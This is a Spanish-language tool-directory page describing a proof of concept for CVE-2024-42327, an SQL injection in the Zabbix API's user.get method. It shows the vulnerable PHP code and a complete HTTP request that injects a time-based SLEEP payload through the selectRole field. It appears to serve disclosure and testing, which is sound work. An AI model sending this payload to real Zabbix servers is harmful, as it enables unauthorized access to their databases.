Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/compr00t/cve-2024-42327
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubcompr00t/cve-2024-42327

CVE-2024-42327

PoC para CVE-2024-42327 / ZBX-25623

Ver Repositorio
185hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

PoC para CVE-2024-42327 / ZBX-25623

Una cuenta de usuario no administrador en el frontend de Zabbix con el rol de Usuario predeterminado, o con cualquier otro rol que otorgue acceso a la API, puede explotar esta vulnerabilidad. Existe un SQLi en la clase CUser en la función addRelatedObjects; esta función es llamada desde la función CUser.get, la cual está disponible para todo usuario que tenga acceso a la API.

Descargo de responsabilidad

¡Este script se proporciona únicamente con fines educativos!

Prueba de Concepto

El siguiente código de la versión 6.0.31 es vulnerable a SQLi:

root@kitploit:~
$db_roles = DBselect(
	'SELECT u.userid'.($options['selectRole'] ? ',r.'.implode(',r.', $options['selectRole']) : '').
	' FROM users u,role r'.
	' WHERE u.roleid=r.roleid'.
	' AND '.dbConditionInt('u.userid', $userIds)
);

La siguiente llamada desencadena la vulnerabilidad:

root@kitploit:~
POST /api_jsonrpc.php HTTP/1.1
Host: localhost
User-Agent: curl/8.11.0
Accept: */*
Content-Type: application/json
Content-Length: 222
Connection: keep-alive

{
  "jsonrpc": "2.0",
  "method": "user.get",
  "params": {
    "selectRole": ["roleid", "name", "type", "readonly AND (SELECT(SLEEP(5)))"],
    "userids": ["1","2"]
  },
  "id": 1,
  "auth": ""
}

Referencias

  • https://support.zabbix.com/browse/ZBX-25623
  • https://nvd.nist.gov/vuln/detail/CVE-2024-42327
Descargar herramienta